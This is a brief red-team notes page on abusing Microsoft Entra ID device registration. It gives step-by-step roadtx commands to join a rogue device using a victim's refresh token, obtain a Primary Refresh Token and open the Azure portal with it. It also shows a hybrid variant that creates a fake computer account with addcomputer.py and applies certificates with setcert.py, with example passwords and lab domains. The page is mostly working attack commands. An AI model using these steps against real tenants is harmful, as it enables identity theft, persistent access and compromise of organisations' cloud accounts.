🐱‍💻 nix

Register a Device

2 min read

Token Requirements

ClientIdResource
29d9ed98-a469-4536-ade2-f981bc1d605eurn:ms-drs:enterpriseregistration.windows.net

Entra Joined

This means that the device does not exists in on-prem setup. For example, you can join your laptop to Entra without having to join the laptop to your on-prem Active Directory setup.

  1. Create and register the device.
roadtx device -a join -n DESKTOP-LAPJS2K

It should return key pairs for the device (.pem and .key files). The keys will later be used to request a Primary Refresh Token (PRT)

  1. Request a PRT with roadtx

Note

file indicates that we a using the previous refresh token or the victim user and a device registered under the same user.

roadtx prt --refresh-token file -c desktop-lapjs2k.pem -k desktop-lapjs2k.key

If all requirements are met and validated, roadtx should generate a .prt file (roadtx.prt). You can use the file with browserprtauth module to browse seamlessly.

roadtx browserprtauth -url https://portal.azure.com

Hybrid Device

Hybrid differs from Entra joined device, a hybrid device is an existing device joined to on-prem Active Directory domain. The idea of this technique will require us to own a on-premise device either by compromising a victim device, or create a fake computer with the classic addcomputer.py

  1. Create a fake computer with addcomputer.py
addcomputer.py cybernetics.ink/gordon:'P@$$w0rd!xyz' -dc-ip 10.66.66.7

  1. Apply certificates on the controlled computer account with setcert.py.
python3 setcert.py 10.66.66.7 -t 'DESKTOP-ATW2XQBF$' -u 'cybernetics.ink\DESKTOP-ATW2XQBF$' -p 'tuyfVZjfFGmkyKb8qM45NPSS9pyxdMAL'

  1. Join the device
roadtx device -a join -c DESKTOP-ATW2XQBF.pem -k DESKTOP-ATW2XQBF.key
  1. Request a PRT
roadtx prt --refresh-token file -c DESKTOP-ATW2XQBF.pem -k DESKTOP-ATW2XQBF.key
  1. Use roadtx’s browserprtauth to browse seamlessly.
roadtx browserprtauth -url https://portal.azure.com

Warning

If you receive an error regarding a mozilla driver not found. You can download the driver from here and specify -d flag with the file path of the driver.